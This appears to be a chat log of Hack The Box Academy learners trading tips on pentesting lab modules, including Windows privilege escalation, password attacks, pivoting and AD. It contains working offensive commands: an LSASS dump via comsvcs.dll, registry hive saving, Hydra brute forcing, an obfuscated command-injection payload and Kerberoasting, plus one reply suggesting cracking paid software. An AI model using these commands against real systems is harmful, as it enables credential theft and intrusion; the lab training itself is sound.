tasklist /fi "PID eq <pid-no>"

to know which service was running on that port. The output I got is: 
```bash
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
FileZilla Server.exe          2096 Services                   0     11,004 K

but this answer is incorrect ?? Can anyone help in this ?

Hallos

Read the question again and you'll see you have the answer

On Windows Priv Esc > Windows Server - When trying to set up the meterpreter session I get the following error on target when running the dll

Could it we the port in metasploit? Couldn't use the default one (445) since it gives Permission denied

Thanks got it, a silly mistake.

been there

Hi! i am a bit stucket with windows privilege escalation assessment 1. The target appears to be vulnerable but session is not created with the exploit. Can someone please help? msf](Jobs:1 Agents:1) post(multi/recon/local_exploit_suggester) >> exploit

[] 10.129.225.46 - Collecting local exploits for x64/windows...
[] 10.129.225.46 - 181 exploit checks are being tried...
[+] 10.129.225.46 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.129.225.46 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.129.225.46 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.129.225.46 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 10.129.225.46 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.129.225.46 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.129.225.46 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[] Running check method for exploit 42 / 42
[] 10.129.225.46 - Valid modules for session 1:

Password attacks --> Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.

Password Mutations; I've used the provided lists to create a mutated list with the next cmd: hashcat password.list -r custom.rule --stdout | sort -u > mut_password.list

what did you do after creating the mutated wordlist?

Nothing...what did I miss?

i believe you’re supposed to use that wordlist to bruteforce the password for the user sam

i might be wrong tho

Yes, that is what i tried.

with hashcat

hydra -l sam -P password.list ssh://10.129.74.79

that’s not what you saved the list as in the command above

Sorry, i've used the mut_password but that one does not give any results so far, that one is already running for a while

look to see if there’re any other protocols apart from ssh

ssh can be quite slow to attack

will try ftp

great idea!

Thanks for the help!

hi is there a good way to enumerate CLSID?

so i figured out that the exploit doesnt work bc i dont use a good clsid, but when i search the target with a ps1 tool provided by juicypotato github. It doesnt show any clsids. Someone has any suggestion what to do now?

windows priv skill assessment is a bit frustrating 😄

Can some1 help me with a question in Intro to AD

tried this website? http://ohpe.it/juicy-potato/CLSID/

Solved! Thanks

Module : modern web exploitation ,, second order LFI ,, changed the names multiple time using different bypassing techniques but did't work anyone might help

i got the script from it

but im gonna just try random clsid-s i think

Bro leaked where he lives

?

how to get burpsuite professional for free?

you crack it

You dont

how

I'm on the MacOS fundamentals. It's asking me questions about an instance of MacOS and I can't find any way to launch a MacOS instance anywhere on the page. What am I missing?

you're supposed to use your own mac machine

Well that was never communicated

HTB has used the word "machine" to mean HTB hosted VM in pretty much every other use of the term

it's in the info page before you start the module

Where is that blurb located?

https://academy.hackthebox.com/module/details/157

Once again, I don't know why this nmap scan is take so long to scan the network with my ligolo-ng tool...even though I am using the correct subnet for the IPV4 address I want the nmap tool to scan.
sudo ip route add 172.16.0.0/16 dev ligolo

nmap 172.16.0.0/16 -sn

I followed the tutorial on the main ligolo-ng github page and followed some tutorials online. I still don't get any ping response back when I ping nor does the nmap tool scan the subnet

Oh, I finished Windows and just had the "Continue your path"

Which started MacOS without the main screen explaining it

you can still do the questions, just need to google the right thing

I'll just dust off the macbook. Hopefully the answers are still compatible with newer macOS versions

And when I type 'ip route' address the scope is there to scan

Got an issue with skill assessment in the module login brute forcing someone who finish it avaible for dm?

Is this a first / second pivot?

I ran the agent.exe with the target machine ... and then it returned a list that contain three Interface...one of them including the 172.16.x.x...the address I am initially trying to pivot

so add 172.16.6.0/24 to your IP route list and start the tunnel.

even if it starts with 172.16.6.100/16?

Then ping the internal network 172.16.6.100 to check if it worked

The /16 notation allows for significantly more host addresses compared to 172.16.5.0/24.
Don’t think you’re gonna need that much on a small lab environment.

you mean after I add 172.16.6.0/24?

Yeah, remember to start the tunnel before you ping.

You can also add a single interface to the route list;
sudo ip route add 172.16.6.100 dev ligolo.

Ok. it showed nmap scan results and of course I got a ping connection response back. ,but ligolo also showed connection refuses error. since nmap scan shows port 80(and 445 smb port) get to the web address for that IP internal address

Hey guys,
Regarding the broken authentication module for timing attack exercise, question 3, using timing.py.
I'm getting times completely different everytime that I run the script. Any suggestion or tip? Thanks in advance 🙂

Anyone got a hint for the 4th flag at Linux Local Privilege Escalation - Skills Assessment? I've found the creds for t*******m user and logged in to the service manager. Am able to upload stuff but the shells won't work 😦

a time saving tip is to get rid of|| passwords under 10 characters long||. doing so, Hydra ran the process in 12 min, while I've heard some folks it took close an hour

Hi guys i need some help with AD Enumeration & Attacks - Skills Assessment Part I iam at the question 4 iam trying to pivot with chise ,netsh l and the creds i got from the questions before to ms01 via xfreerdp but i just cant get in . I dont understand what iam doing wrong... could someone give me a tip maybe

So I copied the 176.16.6.100 in the web address ...set up a net cat listener on my attacking machine and executed the reverse powershell ...but it just took me back to the target machine address , not the desktop with the internal address. Should I have executed my net cat listener on my target machine?(10.129.43.187)

hey so i'm stuck on a very basic question ....
question: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
i came up with this regex syntax which gives me all the paths but that's not the answer soo anyone has any suggestions ?
['\"]([^'\"]*inlanefreight.com[^'\"]*)['\"]

would inlanefright.com/wp-includes/whatever and inlanefright.com/wp-includes/whatever2 not actually be unique ?

it's more of an understanding problem i guess for me 🤔

password attacks --> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full should give me a dump in PS but it does not do anything. The alternative i know via procdump does not work. What did i do wrong?

Thanks! Did that because i needed the creds in the next question and i did not note them 🥲 saved some time.

Yes it should be in your attack box. Did you also set up a listener in ligolo ?

wdym does not work, are you running as admin? and try saving to a user dir rather than C root

maybe you don't have privilege to dump the process so try with admin , and maybe you cannot write in C:\ so try C:\windows\temp\

some1 having issues with rdp ?

it's to slow and laggy

use the same script used in the module

I'm in admin mode, ive done the reg.exe save hklm\security C:\security.save etc without any trouble, including file transfer

Am stuck with footprint medium lab right now i have been login to adminstrator via rdp but i can not find user HTB's password

Any body have some tip where can i find it ?

okay please screenshot of "whoami /priv"

it looks good , you should be able to dump it

Any body can help Am stuck with footprint medium lab right now i have been login to adminstrator via rdp but i can not find user HTB's password

i thought so, the practice isnt using this or unlocking this option. Its password attacks

are you sure , the pid is 672 ?

You don’t need to spam the messages mate.

Look for an internal service and enumerate there.

Would I set up a net cat listener onto the target machine? I tried the attacking machine (after I did my ligolo attack) and that didn't work

Depends on what you’re doing.
Are you trying to catch a reverse shell?

Yep, this time for the 172.16.x.x address

What is that address?

172.16.6.100

don't you already have access to that device?

isn't that the device that's hooked into your ligolo proxy

Exactly, I really don’t know what he’s trying to do.

You already have access, no?

Session Security

Section: XSS

Hello I'm trying to repeat the methods in the section but I can't make connections through my payload to my php server. It worked once and then it stopped working. Can I DM anyone?

command injections --> advanced obfuscation --> ip=127.0.0.1%0a${IFS}ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=
This payload does not give me an error, just the ping results. What did i do wrong ? I want the output of the cmd

When I do ifconfig , it list that address . But I actually haven't connected to it . I did an nmap scan of that address and listed the ports associated with that address

What do you mean you haven’t connected to it?

I mean I am not in that network. The network just lists that address when I type 'ifconfig'

But you pinged it and it worked; you got responses right? Also nmap came with some results

yep. and I was able to copy and paste that internal address into the web browser. but when I tried to access desktop portion of the internal address...it just took me to the desktop of the target IP machine

nmap results showed port 80 as a port

because the internal IP and the public facing one all belongs to the same host. maybe you are trying to connect to another host on that 172.16.6.0/24 network?

run this command on your attack machine crackmapexec smb 172.16.6.0/24 and tell me the result you get

is crackmapexec good tool?

very useful , but it's no longer supported , you may consider using nxc

thanks

i wanna ask you smth

I messaged you about this

i got told i must write notes in order to progress, but...maybe my notes can be a lot and unneccessary, or too few, i was doing AD and wrote for every termin in the terminology section

my question is what kind of notes would be useful

like what should i note

Taking good notes is paramount not only for the course but as a pentester

i feel like im wasting so much time copying entire pages simply because everyhting is important lol

guess the more i do it, the more i will know what to note

I totally understand, I took both technical / non-technical notes so Ik how it can be 'time-wasting'.
if you get stuck in the exam / skill assessments you can come back to it.

$ crackmapexec smb 172.16.6.0/24
<frozen importlib._bootstrap>:219: RuntimeWarning: greenlet.greenlet size changed, may indicate binary incompatibility. Expected 144 from C header, got 152 from PyObject
<frozen importlib._bootstrap>:219: RuntimeWarning: greenlet.greenlet size changed, may indicate binary incompatibility. Expected 144 from C header, got 152 from PyObject
<frozen importlib._bootstrap>:219: RuntimeWarning: greenlet.greenlet size changed, may indicate binary incompatibility. Expected 144 from C header, got 152 from PyObject
<frozen importlib._bootstrap>:219: RuntimeWarning: greenlet.greenlet size changed, may indicate binary incompatibility. Expected 144 from C header, got 152 from PyObject
<frozen importlib._bootstrap>:219: RuntimeWarning: greenlet.greenlet size changed, may indicate binary incompatibility. Expected 144 from C header, got 152 from PyObject
<frozen importlib._bootstrap>:219: RuntimeWarning: greenlet.greenlet size changed, may indicate binary incompatibility. Expected 144 from C header, got 152 from PyObject
<frozen importlib._bootstrap>:219: RuntimeWarning: greenlet.greenlet size changed, may indicate binary incompatibility. Expected 144 from C header, got 152 from PyObject
<frozen importlib._bootstrap>:219: RuntimeWarning: greenlet.greenlet size changed, may indicate binary incompatibility. Expected 144 from C header, got 152 from PyObject
<frozen importlib._bootstrap>:219: RuntimeWarning: greenlet.greenlet size changed, may indicate binary incompatibility. Expected 144 from C header, got 152 from PyObject
<frozen importlib._bootstrap>:219: RuntimeWarning: greenlet.greenlet size changed, may indicate binary incompatibility. Expected 144 from C header, got 152 from PyObject
[*] Generating SSL certificate
zsh: segmentation fault crackmapexec smb 172.16.6.0/24

You also have Academy search and the modules to refer back to.

tnx for the advice ;3

Did you run your crackmapexec tool on your local machine? @soft cedar

yeah you run it on your attacking machine

ye

Can ping the internal address okay.

you are now in the internal network , you can use ur tools from the attack machine

like password cracking tools

wdym ?

I guess not then since I am on the network

you can

i also listen to NF

i can see your spotify

hahahaha , good rap

why?

ik ik

Hi everyone ! someone can help me on Skill assessment 1 in Attacking common app module ? i found the cgi dir but couldnt find the executable 😦

Does this mean crackmapexec tool is not installed on my local machine?? crackmapexec --help 127 ⨯
<frozen importlib._bootstrap>:219: RuntimeWarning: greenlet.greenlet size changed, may indicate binary incompatibility. Expected 144 from C header, got 152 from PyObject
<frozen importlib._bootstrap>:219: RuntimeWarning: greenlet.greenlet size changed, may indicate binary incompatibility. Expected 144 from C header, got 152 from PyObject
<frozen importlib._bootstrap>:219: RuntimeWarning: greenlet.greenlet size changed, may indicate binary incompatibility. Expected 144 from C header, got 152 from PyObject

...

...
[*] Generating SSL certificate
zsh: segmentation fault crackmapexec --help

What AD object handles all authentication requests for a domain?
Domain Controllers

Domain Controllers are essentially the brains of an AD network. They handle authentication requests, verify users on the network, and control who can access the various resources in the domain. All access requests are validated via the domain controller and privileged access requests are based on predetermined roles assigned to users. It also enforces security policies and stores information about every other object in the domain.

NATE WHY ITS SAYING ITS WRONG

check with crackmapexec --version

or if its giving error then just google how to check

what is it bruuuuh

WHAT it literally didnt accept Domain Controllers but Domain Controller is the right one

like...tf?

WHY TF THIS RDP IS TOO SLOW , CAN'T RUN CMD

https://tenor.com/view/hug-sad-gif-13610569160273124880

Hi guys i got stuck in Password Reuse / Default passwords section of Password Attacks module. I got the creds for Sam and logged in via ssh. I tried googling to find default creds and roaming around in all the dirs back and forth but couldnt find password for mysql what should i do. [But i did find something interesting in other two user directories but i am not sure whether its relevant to the task at hand]

i genually dont know what RDP stands for cuz i havent gotten there yet, i assume its Remote Desktop Protocol but cant be sure

OMG I ACTUALLY GOT IT RIGHT

yeah you got it

^-^

When I first ran crackmapexec --version . It showed the same error. Tried google and chat gpt suggestions to fixing this error . IF anyone here has encountered a similar error on their local machine(in my case, ubuntu virtualbox) , I really like to here how you troubled shooted that error.

try pipx install nxc

and then use nxc instead of crackmapexec

they had the same syntax

you still stuck?

yeap I have a doubt Is it about mutating the previously found passwords or to guess which passwords were reused in the previously cracked services?

yeah no that would be a rabbit hole, I recommend double checking the resources they give you in that section for default credentials for services you may have enumerated on the box locally.

Finally 😂 I'm done with it! Thanks a lot found the creds for mysql!

yeah no when I was doing the password attacks section I can remember how much of a headache it was

So, get this: The answer was staring me right in the face, and I completely ignored it because I was busy overthinking. Turns out, I attempted to use some local privilege escalation script, but guess what? It hilariously failed because, duh, it needs sudo access! 🤣

Thanks for your reminder !

no problem

Think lots of us can relate...spending lots of time and work while the answer is in our view constantly

am i using fake time correctly proxychains sudo faketime '2024-02-20T20:56:55' /bin/date | proxychains GetUserSPNs.py -dc-ip 172.16.8.3 INLANEFREIGHT.LOCAL/mssqladm -request-user ttimmons

fuck yeah i got it

I initially had issues with running that command. Then followed steps suggested by chatgpt online to follow the pipx command. Verified that pipx was installed with 'pipx --version'. Ran the command again and got a new error. Followed the steps that chat gpt suggested and their suggestions did not work.

Also do you think the command that I am running has to do with the version of linux that I am running on my local machine?

User
pipx install nxc
The virtual environment was not created successfully because ensurepip is not
available. On Debian/Ubuntu systems, you need to install the python3-venv
package using the following command.

apt-get install python3-venv

You may need to use sudo with that command. After installing the python3-venv
package, recreate your virtual environment.

Failing command: ['/home/noblegas/.local/share/pipx/shared/bin/python3', '-Im', 'ensurepip', '--upgrade', '--default-pip']

'/usr/bin/python3 -m venv --clear /home/noblegas/.local/share/pipx/shared' failed

uname -a 1 ⨯
Linux kali 5.9.0-kali1-amd64 #1 SMP Debian 5.9.1-1kali2 (2020-10-29) x86_64 GNU/Linux

I stopped working on the CPTS three weeks ago because of all the issues with their VPN's and still cannot access targets

Is there a channel that is providing an ETA when this will be fixed?

Have you contacted support?

so many times

they tell me to switch the vpn connections.

I litterally have them saved on my desktop and switched to each one, spawned a new box each time and attempted connection

EU1 UDP is working for the particular module I am on now, but the RDP connection to the target is lagging and keeps disconnecting

have you tried in xfreerdp using the flag /network:modem? this helps for me

Whenever you change vpn it generates a new one as an fyi

So saving a bunch of old ones doesn't help

I can, DM me. And please remove the spoiler if you may.

hello

how can u solve the creds hunting in linux section in the password attacks without the hint?

how can u find the kira creds?

Enumerating likely

The targets are reused within that module

So you can go to any one of the linux ones and check /home/ for usernames

Hello i am having hard time with the Linux Fundamentals ( Submit the full path of the "xxd" binary.)
i have found it but i think i am writing wrong

who is the author of Recollection sherlock challenge?

better ask in #sherlocks
if you have no access, read and follow #welcome

true

im in Passwd, Shadow & Opasswd
section , i can't crack the root hash with neither rockyou.txt or password.list from resources

Perhaps a mutated list will work

yes i did it but still hashcat got exhausted

orr wait

i tried the mutated list , and even created a mutated list with will's password, ran hashcat, still exhausted

anyone else having lab connection issues in the Windows Attacks & Defense module?

i'm seeing a lot of this very frequently, then i get about 30-60 seconds before i lose connection again

Why would you mutate his password?

You can reach out to support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

i'm taking a break now, so if it happens again when i continue, i will do so. thanks

tbh i just tried it for no reason since every other wordlist didn't work

or maybe im doing something wrong

Try with just the root opasswd part in a file see if you get an error

hi 🙂 any idea what could be wrong with my syntax ?

||ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://faculty.academy.htb:49492/FUZZ -recursion -recursion-depth 1 -e .php,.phps,.php7 -v||

FFuF skill assesment

how are you writing it?

looks fine to me

did you get any errors?

i just tried it

idk what im doing wrong

1- i found the hidden folder

i get nothing back